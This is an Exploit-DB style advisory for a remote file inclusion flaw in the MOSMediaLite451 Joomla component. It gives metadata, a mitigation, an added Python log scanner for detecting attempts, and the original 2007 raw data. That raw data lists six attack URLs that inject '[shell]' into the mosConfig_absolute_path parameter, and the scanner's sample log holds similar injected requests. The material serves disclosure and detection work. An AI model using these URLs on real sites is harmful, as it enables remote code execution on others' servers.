Vendor: MOSMediaLite451
By: k1n9k0ng
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: MOSMediaLite451
Affected Version From: MOSMediaLite451
Affected Version To: MOSMediaLite451
Patch Exists: NO
Related CWE:
CPE: a:mosmedialite:mosmedialite451
Metasploit:
Other Scripts:
Platforms Tested:
2007

MOSMediaLite451 Exploit

The MOSMediaLite451 script is vulnerable to remote file inclusion. The vulnerability allows an attacker to include and execute arbitrary files from a remote server by manipulating the 'mosConfig_absolute_path' parameter in various PHP files.

Mitigation:

The vendor should release a patch to fix the vulnerability. In the meantime, users are advised to remove or restrict access to the affected files.
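To find out whether the affected files have already been requested with the parameter set, the following added example (not part of the original advisory or of the MOSMediaLite code) scans web server access logs for the six include files named in the raw data. It assumes Combined Log Format; the function name, field names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# The six include files named in the advisory's raw data.
AFFECTED = {"credits.html.php", "info.html.php", "media.divs.php",
            "media.divs.js.php", "purchase.html.php", "support.html.php"}
PREFIX = "/administrator/components/com_mosmedia/includes/"
PARAM = "mosConfig_absolute_path"

# Combined Log Format fields used here: client, timestamp, request, status.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# A value with a URL scheme (or protocol-relative //) is not a local path.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def scan(lines):
    """Return one finding per request that sets PARAM on an affected file."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_path, _, query = m["target"].partition("?")
        path = re.sub(r"/+", "/", unquote(raw_path))  # undo %xx and doubled slashes
        if not path.startswith(PREFIX) or path[len(PREFIX):] not in AFFECTED:
            continue
        values = parse_qs(query, keep_blank_values=True).get(PARAM)
        if values is None:
            continue  # request without the parameter: not this pattern
        findings.append({"ip": m["ip"], "time": m["ts"],
                         "file": path[len(PREFIX):],
                         "status": int(m["status"]),
                         "remote_value": any(REMOTE_RE.match(v) for v in values)})
    return findings

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Oct/2007:10:01:02 +0000] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://files.example/inc HTTP/1.1" 200 512',
    '203.0.113.7 - - [08/Oct/2007:10:01:05 +0000] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=ftp%3A%2F%2Ffiles.example%2Finc HTTP/1.1" 404 210',
    '198.51.100.4 - - [08/Oct/2007:10:02:00 +0000] "GET /index.php?option=com_mosmedia HTTP/1.1" 200 9000',
    '198.51.100.4 - - [08/Oct/2007:10:02:09 +0000] "GET /administrator/components/com_mosmedia/includes/support.html.php HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Findings with `remote_value` set and a 200 status are the ones to triage first; any finding at all shows the files are reachable and should be removed or access-restricted as described above.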
Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : MOSMediaLite451
Discovered By   : k1n9k0ng
Scripts site    : http://www.djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );

bug found:
"http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell] " 

# milw0rm.com [2007-10-08]